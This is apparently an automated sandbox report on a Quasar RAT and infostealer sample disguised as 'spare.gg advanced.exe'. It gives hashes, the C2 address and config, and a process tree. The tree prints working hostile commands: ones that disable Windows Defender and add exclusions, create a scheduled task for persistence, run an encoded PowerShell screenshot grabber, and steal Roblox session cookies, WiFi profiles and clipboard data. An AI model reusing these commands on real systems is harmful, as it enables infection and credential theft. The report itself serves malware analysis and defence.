Analysis

  • max time kernel
    129s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 21:01

General

  • Target

    spare.gg advanced.exe

  • Size

    9.4MB

  • MD5

    84b24fd57af6b0e675d4712551299eaa

  • SHA1

    580c5dbab07936a8d817e4d95e79df5955127fb4

  • SHA256

    e23c864c53fb943c8675556990cd030d5b9c12f03becf8ac570793f1549ba08b

  • SHA512

    0170138bd6d8de879021d3c85c4ce5133dd936c7ce3be965fbda3fdc2ac395e7a244026dabac84ae6f0d7a6ee6c47aa67ed06aa464814588e8e03a8b6a672b1d

  • SSDEEP

    196608:j+b+sxfNQvKe0urErvI9pWjgU1DEzx7sKL/s1tySEQAkjUWlRH2WE:0Xxf2Se0urEUWjhEhn01tv392WE

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

86.13.66.89:4782

Mutex

584f887c-7024-4e16-a56b-684919f2613f

Attributes
  • encryption_key

    F478C43DE74A681AD4F5AF6B28E598051B310CDC

  • install_name

    WPShell.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows PowerShell

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 46 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\spare.gg advanced.exe
    "C:\Users\Admin\AppData\Local\Temp\spare.gg advanced.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4492
    • C:\Users\Admin\AppData\Local\Temp\spare.gg advanced.exe
      "C:\Users\Admin\AppData\Local\Temp\spare.gg advanced.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4644
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spare.gg advanced.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2720
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spare.gg advanced.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4692
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4512
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2768
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2180
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1412
          • C:\Windows\SYSTEM32\schtasks.exe
            "schtasks" /create /tn "Windows PowerShell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\WPShell.exe" /rl HIGHEST /f
            5⤵
            • Creates scheduled task(s)
            PID:5344
          • C:\Users\Admin\AppData\Roaming\SubDir\WPShell.exe
            "C:\Users\Admin\AppData\Roaming\SubDir\WPShell.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:5964
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "Windows PowerShell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\WPShell.exe" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:2076
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Hello, your files have been taken and stored in our data base. If you wish to appeal / decrypt the information contact @federal.charges on discord!', 0, '@federal.charges - on dc', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3256
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Hello, your files have been taken and stored in our data base. If you wish to appeal / decrypt the information contact @federal.charges on discord!', 0, '@federal.charges - on dc', 0+16);close()"
          4⤵
            PID:4632
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‎ ‏ .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2432
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‎ ‏ .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2920
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1468
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:880
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1760
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1956
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3188
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5532
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3744
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5364
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2536
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:5580
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5096
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:5392
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4036
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
                PID:5632
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3628
              • C:\Windows\system32\systeminfo.exe
                systeminfo
                4⤵
                • Gathers system information
                PID:5652
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1128
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5592
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dye2y1ed\dye2y1ed.cmdline"
                  5⤵
                    PID:5780
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE26.tmp" "c:\Users\Admin\AppData\Local\Temp\dye2y1ed\CSC6433349B87FA4641935D9DA233BCFC5C.TMP"
                      6⤵
                        PID:1848
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:5840
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:6116
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:3760
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:5560
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:5548
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:388
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:5716
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:6064
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:6036
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:2220
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4672"
                                      3⤵
                                        PID:6108
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /F /PID 4672
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5260
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"
                                        3⤵
                                          PID:5844
                                          • C:\Windows\system32\taskkill.exe
                                            taskkill /F /PID 3948
                                            4⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3176
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1924"
                                          3⤵
                                            PID:5568
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              4⤵
                                                PID:5560
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /F /PID 1924
                                                4⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5140
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3088"
                                              3⤵
                                                PID:5220
                                                • C:\Windows\system32\taskkill.exe
                                                  taskkill /F /PID 3088
                                                  4⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5392
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2092"
                                                3⤵
                                                  PID:5344
                                                  • C:\Windows\system32\taskkill.exe
                                                    taskkill /F /PID 2092
                                                    4⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5468
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                  3⤵
                                                    PID:5720
                                                    • C:\Windows\system32\getmac.exe
                                                      getmac
                                                      4⤵
                                                        PID:968
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3268"
                                                      3⤵
                                                        PID:1412
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          4⤵
                                                            PID:6064
                                                          • C:\Windows\system32\taskkill.exe
                                                            taskkill /F /PID 3268
                                                            4⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5728
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:1676
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3408
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:5044
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1012
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44922\rar.exe a -r -hp"federalencrypter" "C:\Users\Admin\AppData\Local\Temp\i510J.zip" *"
                                                              3⤵
